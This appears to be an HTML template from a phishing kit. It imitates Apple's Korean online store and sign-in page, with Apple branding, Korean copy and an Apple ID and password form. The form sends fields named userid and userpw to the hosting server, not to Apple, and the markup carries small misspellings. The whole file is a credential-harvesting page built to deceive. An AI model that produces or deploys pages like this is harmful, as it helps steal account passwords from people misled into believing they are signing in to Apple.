{% include "./top.html" %}

<main class="main" role="main" data-anim-scroll-group="bubble-gum-group">
    <section class="homepage-section collection-module">
        <div data-unit-id="shop-online" data-analytics-activitymap-region-id="ribbon-shop-online">
            <div class="module-content">
                <div class="ribbon-shop-online">
                    <div class="section-content section-content-shop-online">
                        <span class="covid-ribbon-copy variant">
                            <a href="/kr/shop/goto/shop" target="_self" data-analytics-title="shop online - control">
                                온라인으로 쇼핑
                            </a>
                            하고 무료 배송, 스페셜리스트 지원 등의 혜택을 받으세요.
                        </span>
                    </div>
                </div>
            </div>
        </div>
    </section>
</main>

<div class="login-container">
    <div class="login-wrapper">
        <div class="hero signin">
            <div id="autWidgetContainer" class="auth-widget-container">
                <div class="rs-aos-sign-in-form">
                    <form id="sign-in-form-fields" method="POST" action="/">
                        <div class="rs-aos-sign-in-fields">
                            <div class="form-textbox">
                                <input class="form-textbox-input" type="text" name="userid">
                                <span class="form-textbox-label" aria-hidden="true">
                                    Apple ID
                                </span>
                            </div>
                            <div class="form-textbox">
                                <input class="form-textbox-input" type="password" name="userpw">
                                <span class="form-textbox-lebel" aria-hidden="ture">
                                    암호
                                </span>
                            </div>
                        </div>
                        <p class="rs-sign-in-info">
                            Apple ID는 Itunes, App Store에 로그인 할 때 사용하는 이메일 주소입니다.
                        </p>
                        <div class="rs-aos-sign-in-submit">
                            <div id="loginBtn" type="submit" >
                                <span>
                                    <span>로그인</span>
                                </span>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>



{% include "./bottom.html" %}